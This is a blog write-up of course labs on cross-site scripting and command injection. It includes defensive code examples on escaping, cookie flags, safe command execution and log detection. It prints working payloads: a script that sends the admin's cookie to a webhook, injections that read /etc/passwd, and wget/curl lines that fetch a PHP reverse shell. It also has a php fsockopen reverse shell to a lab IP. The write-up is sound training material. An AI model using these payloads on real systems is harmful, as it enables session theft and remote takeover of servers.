
TCM Security — Practical Ethical Hacking Course — Find & Exploit Common Web Vulnerabilities — XSS & Command Injection

Shivansh Seth
6 min read · Apr 16, 2024

Cross Site Scripting — XSS

There are three main types of XSS: Reflected XSS, Stored XSS and DOM-based XSS. In Reflected XSS the payload travels in the request and the server echoes it back in the response; in Stored XSS the server saves the payload and serves it to other users later; in DOM-based XSS client-side JavaScript writes the untrusted input into the page without any server round trip.

XSS 0x01

The lab gives us an input field, and whatever we enter is reflected back on the page. At first glance this looks like a potential Reflected XSS vulnerability. But when we open the Network tab of the browser's developer tools, no request is sent to the server when the input is reflected: everything happens locally in the page's JavaScript, which makes it a DOM-based XSS vulnerability.

Now we use a basic payload to check what is being filtered and what is not. The payload used: <img src=x onerror="prompt(1)">

On submitting it, a broken-image icon is added to the list and a prompt box appears: the image source fails to load, so the onerror handler runs.

So the script executes locally, without any server round trip, which confirms the DOM-based XSS vulnerability.
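As an added example (not code from the course or from this post), the following shows why the lab's reflection is exploitable and why stripping <script> tags alone would not fix it. It compares a naive script-tag blocklist, a proper HTML-encoding function, and a small checker for what would execute if the string were assigned to innerHTML, on the two payload shapes used in this section. The function names are mine; it runs on plain strings under Node, so no browser is needed.

```javascript
// Added example, not code from the original post or from TCM Security: why the
// lab's reflected input is exploitable and why a blocklist on <script> is not a
// fix. Runs under Node; it only compares the HTML string each approach would
// hand to the browser, so no DOM is needed.

// Typical "fix" seen in the wild: strip <script> tags only. This is a blocklist,
// so any other element carrying an event handler still gets through.
function naiveScriptFilter(input) {
  return input.replace(/<\s*\/?\s*script[^>]*>/gi, "");
}

// The real fix for a text sink: encode the HTML-significant characters so the
// browser treats the input as data, never as markup. (In the page itself the
// equivalent is assigning element.textContent instead of element.innerHTML.)
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// A small checker for what would execute if the string were assigned to
// innerHTML: a <script> element, an on* event-handler attribute inside a tag,
// or a javascript: URL. Useful for tests and review, not as a sanitizer.
function wouldExecute(html) {
  const scriptTag = /<\s*script\b/i.test(html);
  const eventHandler = /<[^>]*\son[a-z]+\s*=/i.test(html);
  const jsUrl = /<[^>]*\s(?:href|src)\s*=\s*["']?\s*javascript:/i.test(html);
  return scriptTag || eventHandler || jsUrl;
}

// Compare the three handling strategies on one input:
//   raw      - what the lab does (input goes straight into innerHTML)
//   filtered - after the naive <script> blocklist
//   escaped  - after HTML encoding
function compare(input) {
  return {
    raw: wouldExecute(input),
    filtered: wouldExecute(naiveScriptFilter(input)),
    escaped: wouldExecute(escapeHtml(input)),
  };
}

// The two payload shapes from this section of the write-up.
const PAYLOADS = ["<script>prompt(1)</script>", '<img src=x onerror="prompt(1)">'];
for (const p of PAYLOADS) console.log(p, compare(p));
```

The script-tag payload is stopped by the blocklist, but the img/onerror payload passes it untouched, which is exactly the gap the lab's payload exploits. Only the encoded version neutralises both, because the browser never sees a `<` that could open a tag.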

XSS 0x02

For the second lab we install the Firefox Multi-Account Containers extension.

We open the lab twice in the same browser, each copy in a different container, so we can check whether changes made in one are reflected in the other. We also add a cookie editor extension to see how the containers separate login sessions: add a cookie in one container and read it from the console with document.cookie. The cookie shows up in the container it was added to but not in the other one, which shows that the two containers are running separate sessions.

First we use an HTML injection to check whether submitted markup is rendered. Enter a basic HTML injection such as <h1>test</h1> in one container and look at the result. When you switch to the second container, the same injected markup appears there too without you entering it: the input has been stored on the server and is served to other sessions, which indicates a potential Stored XSS vulnerability.

XSS 0x03

Here we need to understand webhooks to follow how the payload actually works. The payload we use is: <script>var i = new Image;i.src="<webhook_url>"+document.cookie;</script>

We put our own webhook URL into the payload, after which we can get the admin's cookie easily. When we submit this payload as a support ticket, the webhook is hit every time the admin panel refreshes and renders the ticket, and each hit delivers the admin's cookie to the webhook server.
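The exfiltration above works only because document.cookie can read the admin's session cookie, which means it was set without the HttpOnly flag. As an added example (not from the post or the course), here is a small audit of Set-Cookie headers for the attributes a session cookie should carry, plus a function that reports which cookies a script in the page would be able to read. The header values are constructed samples and the function names are mine.

```javascript
// Added example, not from the original post: audits Set-Cookie headers for the
// attributes that would have blunted the cookie-theft payload above. Sample
// headers are constructed; the session value is a placeholder.

// Parse one Set-Cookie header value into name, value and lower-cased attributes.
function parseSetCookie(header) {
  const [pair, ...rawAttrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? "" : pair.slice(eq + 1);
  const attrs = {};
  for (const a of rawAttrs) {
    if (!a) continue;
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name, value, attrs };
}

// Findings for a session cookie. The first one is the lab's actual weakness:
// without HttpOnly the cookie is exposed to document.cookie, so any XSS can
// ship it off to a webhook exactly as the payload above does.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) findings.push("missing HttpOnly: readable via document.cookie, so XSS can steal it");
  if (!c.attrs.secure) findings.push("missing Secure: also sent over plain HTTP");
  const ss = typeof c.attrs.samesite === "string" ? c.attrs.samesite.toLowerCase() : null;
  if (!ss || ss === "none") findings.push("SameSite absent or None: sent on cross-site requests");
  return { name: c.name, findings };
}

// What a script running in the page would see: the names of all cookies that
// were not marked HttpOnly (browsers hide HttpOnly cookies from document.cookie).
function visibleToScript(headers) {
  return headers.map(parseSetCookie).filter((c) => !c.attrs.httponly).map((c) => c.name);
}

// Constructed samples: the weak form the lab evidently uses, and a hardened one.
const SAMPLE_WEAK = "PHPSESSID=constructed-admin-session; Path=/";
const SAMPLE_HARDENED = "PHPSESSID=constructed-admin-session; Path=/; HttpOnly; Secure; SameSite=Lax";
const SAMPLE_THEME = "theme=dark; Path=/";

console.log(auditSessionCookie(SAMPLE_WEAK));
console.log(auditSessionCookie(SAMPLE_HARDENED));
console.log("readable by page scripts:", visibleToScript([SAMPLE_WEAK, SAMPLE_HARDENED, SAMPLE_THEME]));
```

HttpOnly does not stop XSS itself, and a script can still act as the user while the page is open, but it does stop the cookie from leaving the browser through document.cookie, which is the whole mechanism of this lab's payload.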

COMMAND INJECTION

Command injection (CI) is a critical vulnerability because it lets us run almost any command we want on the host.

In the introduction we learn to use the interactive PHP shell, started with the command: php -a

COMMAND INJECTION 0x01

While analyzing the website we find a field for entering a web URL; the site displays the HTTP response code for that URL and also shows the command it ran in the backend to retrieve it.

For reference we'll be learning from this site: https://appsecexplained.gitbook.io/appsecexplained/

The link above covers everything about command injection that we need to learn. It also contains payloads that can be used against the lab websites.

Running the command ; uname -a; asd gave me the following result:

Now we can read the system's /etc/passwd file (the list of user accounts) with a command like cat /etc/passwd, and press Ctrl+U (view page source) to see the output in a more organized form.

Next we take some more interesting payloads from this repository: https://github.com/swisskyrepo/PayloadsAllTheThings

Here we try the Bash TCP reverse shell payload. Before running it we need the exact path of bash on the target, which is easily retrieved with the command: which bash

But this payload didn't give me fruitful results, so we'll shift from Bash TCP to PHP, which is also present on the server. I got the path of PHP as /usr/local/bin/php. I'll be using the PHP payload now, and boom, I got the reverse shell out of it.
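The lab's URL checker is vulnerable because the URL is spliced into a shell command string. As an added example (not the lab's own code, which is PHP and not shown in the post), here is a Node version of that feature in its vulnerable form beside a hardened one. Nothing is executed: each function returns the command string or argument vector that child_process would receive, which is enough to see the difference. The curl command shape and all function names are my assumptions.

```javascript
// Added example, not from the course or the lab: the "check a URL and show the
// response code" feature, first as the vulnerable pattern and then hardened.
// Nothing is spawned here; the functions return what exec()/execFile() would be
// handed. The curl invocation is an assumed stand-in for the lab's backend command.

// Anything that lets a shell end one command and start another, plus whitespace.
const META = /[;&|`$()<>\n\r\t'"\\ ]/;

// Vulnerable: the input is concatenated into a single string that goes to
// /bin/sh via exec(). A ';', '&&' or newline ends the intended command, which is
// exactly what the "; uname -a; asd" input above does.
function vulnerableCommand(userUrl) {
  return `curl -s -o /dev/null -w "%{http_code}" ${userUrl}`;
}

// Hardened: validate the input as an http(s) URL, then return it as its own argv
// element for execFile(). With no shell in the path, metacharacters are literal
// bytes in one argument and cannot start a second command. A percent-encoded
// newline (%0a) survives parsing but is still just part of that one argument.
function safeArgv(userUrl) {
  const m = userUrl.match(META);
  if (m) return { ok: false, reason: `shell metacharacter or whitespace: ${JSON.stringify(m[0])}` };
  let parsed;
  try {
    parsed = new URL(userUrl);
  } catch {
    return { ok: false, reason: "not a valid URL" };
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:")
    return { ok: false, reason: `scheme not allowed: ${parsed.protocol}` };
  // parsed.href is normalised and always starts with the scheme, so curl can
  // never read it as an option such as -o.
  return { ok: true, file: "curl", args: ["-s", "-o", "/dev/null", "-w", "%{http_code}", parsed.href] };
}

// The input shapes from this write-up, plus a benign one and two other rejects.
const INPUTS = [
  "https://tcm-sec.com/",
  "; uname -a; asd",
  "http://tcm-sec.com\nwget 10.0.2.15:8080/test",
  "https://tcm-sec.com && curl 10.0.2.15:8080/rev.php",
  "file:///etc/passwd",
  "notaurl",
];
for (const i of INPUTS) console.log(JSON.stringify(i), "->", safeArgv(i));
```

The metacharacter check is defence in depth rather than the fix: the fix is that execFile never invokes a shell, so there is nothing for a separator to separate. The allowlist on the scheme is what stops the checker being pointed at file:// or other local resources.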

COMMAND INJECTION 0x02

Using a webhook: go to webhook.site, copy the webhook URL, add a ? to it followed by your command in double quotes; when the site fetches the URL the webhook is hit and the command is executed.

In this lab the site does not show us the backend command when we enter a URL. So we use the webhook URL with ?'<command>' appended: when we submit it, the webhook receives the request together with the query string, which shows us how the server is handling our input.

Now that we know the command is being executed, we take one more approach and enter this payload in the search bar: http://tcm-sec.com \n wget ip:8080/test (here \n is used to get a newline, which ends the original command) while at the same time running a Python web server on our machine with the command: python3 -m http.server 8080. A hit on the Python server shows that the target server is able to make outbound requests.

Then we get a PHP reverse shell by copying the script pre-installed on Kali Linux: cp /usr/share/webshells/laudanum/php/php-reverse-shell.php .

Update the IP address and port number in it to match the Kali machine you're using.

Two methods were discussed in the video:

  1. https://tcm-sec.com \n wget 10.0.2.15:8080/rev.php
  2. https://tcm-sec.com && curl 10.0.2.15:8080/rev.php > /var/www/html/rev.php

While using the second method we start a Netcat listener on port 4444 to catch the reverse shell, with the command: nc -nvlp 4444. Then we trigger the shell by requesting http://localhost/rev.php

COMMAND INJECTION 0x03

Looking around and playing with the website, we find that the values we enter as "Position X" and "Position Y" are used in a command on the backend. So we can try to execute a simple command by entering value)^2))}';<command>;#. Here value is taken as the input, the closing quote and semicolon end the original command, <command> is executed as the next command by the web server, and # comments out whatever follows.

Then we'll try to pop a shell. Since it is a PHP website, we'll use a PHP reverse shell payload.

We now submit our payload, i.e. value)^2))}';php -r '$sock=fsockopen("10.0.2.4",4242);exec("/bin/sh -i <&3 >&3 2>&3");';#. Then we open the listener on the chosen port and BOOM, we've got our reverse shell.
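From the defender's side, the three labs leave very recognisable traces in web server logs. As an added example (not from the post or the course), here is a small detector for the injection shapes used above (a ;-separated command, a newline-separated command, the ';...;# break-out and the php -r reverse shell) run over constructed Apache-style access log lines. The indicator list and function names are mine; one caveat is built in: only what lands in the request line is visible here, so inputs sent in a POST body need application or WAF logs instead.

```javascript
// Added example, not from the original post: flags the command-injection shapes
// used in the three labs in Apache-style access log lines. Log lines below are
// constructed samples, not real traffic.

// combined-log request line: ip, timestamp, method, path, status
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

// Labelled indicators: shell separators and substitution, the break-out pattern
// from lab 0x03, and the interpreters and network tools the lab payloads rely on.
const INDICATORS = [
  ["separator", /[;\n\r]|&&|\|\|/],
  ["pipe", /\|/],
  ["substitution", /\$\(|`/],
  ["comment-breakout", /['"]\s*;.*#\s*$/],
  ["interpreter", /(?:\bphp\s+-r|\bbash\s+-i|\/bin\/sh)\b/],
  ["network-tool", /\b(?:wget|curl|nc|fsockopen)\b/],
  ["sensitive-file", /\/etc\/(?:passwd|shadow)/],
];

// URL-decode the query string so %0A, %27 and friends are seen as the shell
// would see them; malformed encodings are inspected raw rather than dropped.
function decodeQuery(path) {
  const q = path.indexOf("?");
  if (q === -1) return "";
  const raw = path.slice(q + 1).replace(/\+/g, " ");
  try {
    return decodeURIComponent(raw);
  } catch {
    return raw;
  }
}

// Parse one line and list the indicator labels that match its decoded query.
function inspectLine(line) {
  const m = line.match(LOG_LINE);
  if (!m) return null;
  const [, ip, ts, method, path, status] = m;
  const query = decodeQuery(path);
  const hits = INDICATORS.filter(([, re]) => re.test(query)).map(([label]) => label);
  return { ip, ts, method, path, status, query, hits };
}

// Only the lines with at least one indicator.
function suspicious(lines) {
  return lines.map(inspectLine).filter((r) => r && r.hits.length > 0);
}

// Constructed sample lines mirroring the three labs' inputs plus benign traffic.
const SAMPLE_LOG = [
  '10.0.2.4 - - [16/Apr/2024:10:00:01 +0000] "GET /check?url=http://tcm-sec.com HTTP/1.1" 200 512',
  '10.0.2.4 - - [16/Apr/2024:10:00:09 +0000] "GET /check?url=;%20uname%20-a;%20asd HTTP/1.1" 200 640',
  '10.0.2.4 - - [16/Apr/2024:10:00:20 +0000] "GET /check?url=http://tcm-sec.com%0Awget%2010.0.2.15:8080/test HTTP/1.1" 200 600',
  '10.0.2.4 - - [16/Apr/2024:10:01:02 +0000] "GET /plot?x=5)%5E2))}%27;php%20-r%20%27$sock=fsockopen(%2210.0.2.4%22,4242);%27;%23 HTTP/1.1" 200 300',
  '10.0.2.4 - - [16/Apr/2024:10:01:30 +0000] "GET /search?q=cats+and+dogs HTTP/1.1" 200 2048',
];

for (const r of suspicious(SAMPLE_LOG)) console.log(r.ts, r.ip, r.hits.join(","), JSON.stringify(r.query));
```

A single separator hit can be noise (a legitimate value containing a semicolon), so in practice the interpreter, network-tool and comment-breakout labels are the ones worth alerting on, and a separator plus an outbound request from the web server to an unusual host is the combination that matches labs 0x02 and 0x03 exactly.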

Thank you for reading. Do like👍 and clap👏 if you find it insightful!!
